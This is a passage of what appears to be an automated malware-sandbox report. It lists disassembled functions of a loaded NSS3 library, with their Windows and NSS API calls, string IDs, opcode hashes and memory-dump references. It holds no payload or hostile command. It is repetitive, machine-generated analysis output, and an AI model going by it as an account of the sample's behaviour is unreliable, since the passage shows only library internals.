                                                                                                                                                                                                                                                        • Part of subcall function 6C4BF820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6C4BF8C9
                                                                                                                                                                                                                                                        • Part of subcall function 6C4BF820: free.MOZGLUE(280F10EC,?,?), ref: 6C4BF8D0
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: free$CriticalSection$Delete$DestroyErrorModule$EnterR_smprintfUnlockValue
                                                                                                                                                                                                                                                      • String ID: d$tokens=[0x%x=<%s>]
                                                                                                                                                                                                                                                      • API String ID: 2028831712-1373489631
                                                                                                                                                                                                                                                      • Opcode ID: 588bc3f440a294ba95ef7d308cd4abfb00defd64815552fb2eafc76f830cdf9c
                                                                                                                                                                                                                                                      • Instruction ID: d2121954b11c308731a2fa8168b6f5a17192e2d75b69afc2ea580ef96a01b812
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 588bc3f440a294ba95ef7d308cd4abfb00defd64815552fb2eafc76f830cdf9c
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3771B4B8B052019BEB01DF25EC45F6E3275AF4531DF144039E8099AB62EB32E915D7E3
                                                                                                                                                                                                                                                      Function 6C4B8F40 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SECOID_GetAlgorithmTag_Util.NSS3(6C4B9582), ref: 6C4B8F5B
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CBE30: SECOID_FindOID_Util.NSS3(6C48311B,00000000,?,6C48311B,?), ref: 6C4CBE44
                                                                                                                                                                                                                                                      • PORT_NewArena_Util.NSS3(00000800), ref: 6C4B8F6A
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C4787ED,00000800,6C46EF74,00000000), ref: 6C4D1000
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0FF0: PR_NewLock.NSS3(?,00000800,6C46EF74,00000000), ref: 6C4D1016
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0FF0: PL_InitArenaPool.NSS3(00000000,security,6C4787ED,00000008,?,00000800,6C46EF74,00000000), ref: 6C4D102B
                                                                                                                                                                                                                                                      • SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C4B8FC3
                                                                                                                                                                                                                                                      • PK11_GetIVLength.NSS3(-00000001), ref: 6C4B8FE0
                                                                                                                                                                                                                                                      • SEC_ASN1DecodeItem_Util.NSS3(?,?,6C59D820,6C4B9576), ref: 6C4B8FF9
                                                                                                                                                                                                                                                      • DER_GetInteger_Util.NSS3(?), ref: 6C4B901D
                                                                                                                                                                                                                                                      • PORT_ZAlloc_Util.NSS3(?), ref: 6C4B903E
                                                                                                                                                                                                                                                      • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C4B9062
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000024,?,?), ref: 6C4B90A2
                                                                                                                                                                                                                                                      • PORT_ZAlloc_Util.NSS3(?), ref: 6C4B90CA
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000018,?,?), ref: 6C4B90F0
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE006,00000000), ref: 6C4B912D
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C4B9136
                                                                                                                                                                                                                                                      • PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C4B9145
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Util$Tag_$AlgorithmAlloc_Arena_Findmemcpy$ArenaDecodeErrorFreeInitInteger_Item_K11_LengthLockPoolcallocfree
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3626836424-0
                                                                                                                                                                                                                                                      • Opcode ID: 3f6ce0cfddb13e447ecb2fb3232799d84fca09c6c8a975579e41fb96c0001692
                                                                                                                                                                                                                                                      • Instruction ID: d36f2f11bbee2b8d92e01056e296a2a99b088d866e251e541716e2e63982138d
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3f6ce0cfddb13e447ecb2fb3232799d84fca09c6c8a975579e41fb96c0001692
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6A51D4B1A042409BEB00DF28DC81F9A77F8AFA4318F054529E859E7741E776E945CBE2
                                                                                                                                                                                                                                                      Function 6C46AF30 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 93COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PR_EnterMonitor.NSS3 ref: 6C46AF47
                                                                                                                                                                                                                                                        • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C5390AB
                                                                                                                                                                                                                                                        • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C5390C9
                                                                                                                                                                                                                                                        • Part of subcall function 6C539090: EnterCriticalSection.KERNEL32 ref: 6C5390E5
                                                                                                                                                                                                                                                        • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C539116
                                                                                                                                                                                                                                                        • Part of subcall function 6C539090: LeaveCriticalSection.KERNEL32 ref: 6C53913F
                                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?), ref: 6C46AF6D
                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C46AFA4
                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C46AFAA
                                                                                                                                                                                                                                                      • PR_ExitMonitor.NSS3 ref: 6C46AFB5
                                                                                                                                                                                                                                                      • PR_LogPrint.NSS3(%s decr => %d,?,?), ref: 6C46AFF5
                                                                                                                                                                                                                                                      • PR_ExitMonitor.NSS3 ref: 6C46B005
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C46B014
                                                                                                                                                                                                                                                      • PR_LogPrint.NSS3(Unloaded library %s,?), ref: 6C46B028
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C46B03C
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: MonitorValue$CriticalEnterErrorExitPrintSectionfree$FreeLeaveLibrary
                                                                                                                                                                                                                                                      • String ID: %s decr => %d$Unloaded library %s
                                                                                                                                                                                                                                                      • API String ID: 4015679603-2877805755
                                                                                                                                                                                                                                                      • Opcode ID: 41c737bc3c018ab29d7348c0c21b6205c1a0d1a347188bc064dd3c8a9b0fb098
                                                                                                                                                                                                                                                      • Instruction ID: b7cf09218529176aab2947cdd7d486e66ffc8663187d5986027ced8389707b8b
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 41c737bc3c018ab29d7348c0c21b6205c1a0d1a347188bc064dd3c8a9b0fb098
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6531F1B4B04921ABEB00EE62DC40F1AB7B4EF45319B194125E80987F04F722F825CBE6
                                                                                                                                                                                                                                                      Function 6C4B6C30 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 58stringCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6C4B781D,00000000,6C4ABE2C,?,6C4B6B1D,?,?,?,?,00000000,00000000,6C4B781D), ref: 6C4B6C40
                                                                                                                                                                                                                                                      • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6C4B781D,?,6C4ABE2C,?), ref: 6C4B6C58
                                                                                                                                                                                                                                                      • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6C4B781D), ref: 6C4B6C6F
                                                                                                                                                                                                                                                      • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6C4B6C84
                                                                                                                                                                                                                                                      • PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6C4B6C96
                                                                                                                                                                                                                                                        • Part of subcall function 6C461240: TlsGetValue.KERNEL32(00000040,?,6C46116C,NSPR_LOG_MODULES), ref: 6C461267
                                                                                                                                                                                                                                                        • Part of subcall function 6C461240: EnterCriticalSection.KERNEL32(?,?,?,6C46116C,NSPR_LOG_MODULES), ref: 6C46127C
                                                                                                                                                                                                                                                        • Part of subcall function 6C461240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C46116C,NSPR_LOG_MODULES), ref: 6C461291
                                                                                                                                                                                                                                                        • Part of subcall function 6C461240: PR_Unlock.NSS3(?,?,?,?,6C46116C,NSPR_LOG_MODULES), ref: 6C4612A0
                                                                                                                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6C4B6CAA
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: strncmp$CriticalEnterSectionSecureUnlockValuegetenvstrcmp
                                                                                                                                                                                                                                                      • String ID: NSS_DEFAULT_DB_TYPE$dbm$dbm:$extern:$rdb:$sql:
                                                                                                                                                                                                                                                      • API String ID: 4221828374-3736768024
                                                                                                                                                                                                                                                      • Opcode ID: 102fd910099e1c4046e730a634a77e5a78da98a3fbcca0a0a78191e7ebcfbd47
                                                                                                                                                                                                                                                      • Instruction ID: 897c31a8b1060092653288bfd06bfe4c0126d4ca17aff29620e7d388ce14d90e
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 102fd910099e1c4046e730a634a77e5a78da98a3fbcca0a0a78191e7ebcfbd47
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F501A7B170371537EA10277A5D69F66366C9F42199F180435FE04F0A41EBF2F61940BD
                                                                                                                                                                                                                                                      Function 6C4C5800 Relevance: 19.7, APIs: 13, Instructions: 227COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6C4C5857
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C4C586B
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6C4C5888
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6C4C58B9
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C4C58CD
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6C4C58E9
                                                                                                                                                                                                                                                        • Part of subcall function 6C4C5530: TlsGetValue.KERNEL32(?,?,?,00000000,?,6C4C5915,?), ref: 6C4C5556
                                                                                                                                                                                                                                                        • Part of subcall function 6C4C5530: EnterCriticalSection.KERNEL32(?,?,?,?,00000000,?,6C4C5915,?), ref: 6C4C556F
                                                                                                                                                                                                                                                        • Part of subcall function 6C4C5530: PR_Unlock.NSS3(?,?,?,?,?), ref: 6C4C559C
                                                                                                                                                                                                                                                        • Part of subcall function 6C4C5530: SECMOD_UpdateSlotList.NSS3(?,?,?,?,?), ref: 6C4C55A4
                                                                                                                                                                                                                                                        • Part of subcall function 6C4C5530: PR_Sleep.NSS3(?,?,?,?), ref: 6C4C5643
                                                                                                                                                                                                                                                        • Part of subcall function 6C4C5530: TlsGetValue.KERNEL32(?,?,?,?), ref: 6C4C5653
                                                                                                                                                                                                                                                        • Part of subcall function 6C4C5530: EnterCriticalSection.KERNEL32(?,?,?,?,?), ref: 6C4C5668
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE098,00000000), ref: 6C4C5934
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE09A,00000000), ref: 6C4C59AA
                                                                                                                                                                                                                                                      • SECMOD_UpdateSlotList.NSS3(?), ref: 6C4C59B3
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6C4C5A4D
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C4C5A61
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6C4C5A7A
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CriticalEnterSectionValue$Unlock$ErrorListSlotUpdate$Sleep
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1180358131-0
                                                                                                                                                                                                                                                      • Opcode ID: a2dc1142d27abcdac47a53ff7df99d47edeed25ce444fd3018390ce5249cf2c3
                                                                                                                                                                                                                                                      • Instruction ID: 6ab9620a04b6650978e7c14f5bbfbbb6dff2b9624a341b4c4c845950ed8b045e
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a2dc1142d27abcdac47a53ff7df99d47edeed25ce444fd3018390ce5249cf2c3
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5F81F0B9F006019BEB00DF29DC81E6E77B5BF45328F140528E84A86B62E731E955CB92
                                                                                                                                                                                                                                                      Function 6C4C4E60 Relevance: 19.7, APIs: 13, Instructions: 186COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PR_SetErrorText.NSS3(00000000,00000000,?,6C4878F8), ref: 6C4C4E6D
                                                                                                                                                                                                                                                        • Part of subcall function 6C4609E0: TlsGetValue.KERNEL32(00000000,?,?,?,6C4606A2,00000000,?), ref: 6C4609F8
                                                                                                                                                                                                                                                        • Part of subcall function 6C4609E0: malloc.MOZGLUE(0000001F), ref: 6C460A18
                                                                                                                                                                                                                                                        • Part of subcall function 6C4609E0: memcpy.VCRUNTIME140(?,?,00000001), ref: 6C460A33
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE09A,00000000,?,?,?,6C4878F8), ref: 6C4C4ED9
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B5920: NSSUTIL_ArgHasFlag.NSS3(flags,printPolicyFeedback,?,?,?,?,?,?,00000000,?,00000000,?,6C4B7703,?,00000000,00000000), ref: 6C4B5942
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B5920: NSSUTIL_ArgHasFlag.NSS3(flags,policyCheckIdentifier,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C4B7703), ref: 6C4B5954
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B5920: NSSUTIL_ArgHasFlag.NSS3(flags,policyCheckValue,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C4B596A
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B5920: SECOID_Init.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C4B5984
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B5920: NSSUTIL_ArgGetParamValue.NSS3(disallow,00000000), ref: 6C4B5999
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B5920: free.MOZGLUE(00000000), ref: 6C4B59BA
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B5920: NSSUTIL_ArgGetParamValue.NSS3(allow,00000000), ref: 6C4B59D3
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B5920: free.MOZGLUE(00000000), ref: 6C4B59F5
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B5920: NSSUTIL_ArgGetParamValue.NSS3(disable,00000000), ref: 6C4B5A0A
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B5920: free.MOZGLUE(00000000), ref: 6C4B5A2E
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B5920: NSSUTIL_ArgGetParamValue.NSS3(enable,00000000), ref: 6C4B5A43
                                                                                                                                                                                                                                                      • SECMOD_FindModule.NSS3(?,?,?,?,?,?,?,?,?,6C4878F8), ref: 6C4C4EB3
                                                                                                                                                                                                                                                        • Part of subcall function 6C4C4820: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C4C4EB8,?,?,?,?,?,?,?,?,?,?,6C4878F8), ref: 6C4C484C
                                                                                                                                                                                                                                                        • Part of subcall function 6C4C4820: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C4C4EB8,?,?,?,?,?,?,?,?,?,?,6C4878F8), ref: 6C4C486D
                                                                                                                                                                                                                                                        • Part of subcall function 6C4C4820: PR_SetError.NSS3(FFFFE09A,00000000,00000000,-00000001,00000000,?,6C4C4EB8,?), ref: 6C4C4884
                                                                                                                                                                                                                                                      • SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?,?,?,6C4878F8), ref: 6C4C4EC0
                                                                                                                                                                                                                                                        • Part of subcall function 6C4C4470: TlsGetValue.KERNEL32(00000000,?,6C487296,00000000), ref: 6C4C4487
                                                                                                                                                                                                                                                        • Part of subcall function 6C4C4470: EnterCriticalSection.KERNEL32(?,?,?,6C487296,00000000), ref: 6C4C44A0
                                                                                                                                                                                                                                                        • Part of subcall function 6C4C4470: PR_Unlock.NSS3(?,?,?,?,6C487296,00000000), ref: 6C4C44BB
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6C4878F8), ref: 6C4C4F16
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6C4878F8), ref: 6C4C4F2E
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,6C4878F8), ref: 6C4C4F40
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6C4878F8), ref: 6C4C4F6C
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6C4878F8), ref: 6C4C4F80
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C4878F8), ref: 6C4C4F8F
                                                                                                                                                                                                                                                      • PK11_UpdateSlotAttribute.NSS3(?,6C59DCB0,00000000), ref: 6C4C4FFE
                                                                                                                                                                                                                                                      • PK11_UserDisableSlot.NSS3(0000001E), ref: 6C4C501F
                                                                                                                                                                                                                                                      • SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?,?,6C4878F8), ref: 6C4C506B
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Value$Param$CriticalEnterErrorFlagModuleSectionUnlockfree$DestroyK11_Slotstrcmp$AttributeDisableFindInitTextUpdateUsermallocmemcpy
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 560490210-0
                                                                                                                                                                                                                                                      • Opcode ID: c64f7c710ce87e8d176b0a701da8deeebb42678f96b8a54836d2cad010331643
                                                                                                                                                                                                                                                      • Instruction ID: fec6ad715783ffef66338e84313217c14c5c2cfc5b80a54873538c41b8c1c695
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c64f7c710ce87e8d176b0a701da8deeebb42678f96b8a54836d2cad010331643
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FA5103B9E002019BEB01DF25EC01EAA76B4EF0535EF150138EC0696B21FB31E915CAE7
                                                                                                                                                                                                                                                      Function 6C46ACC0 Relevance: 19.6, APIs: 13, Instructions: 150stringCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: free$Unlock$ErrorValuecallocmallocmemcpystrcpystrlen
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 786543732-0
                                                                                                                                                                                                                                                      • Opcode ID: 4cb28613af993ede68c4c457c8409bf42864b8e0f06decce65a4ab1284eab00f
                                                                                                                                                                                                                                                      • Instruction ID: e4136dce846dc07b2b1b628d8241d503ebaf67a9ddac1e82fb0142ab584fcff0
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4cb28613af993ede68c4c457c8409bf42864b8e0f06decce65a4ab1284eab00f
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B6519AB0A41A259BDF00DF9ADC45EAE77B5EF06359F050029E805A7F00D331BA45CBEA
                                                                                                                                                                                                                                                      Function 6C544C40 Relevance: 19.3, APIs: 3, Strings: 8, Instructions: 97COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • sqlite3_value_text16.NSS3(?), ref: 6C544CAF
                                                                                                                                                                                                                                                      • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C544CFD
                                                                                                                                                                                                                                                      • sqlite3_value_text16.NSS3(?), ref: 6C544D44
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
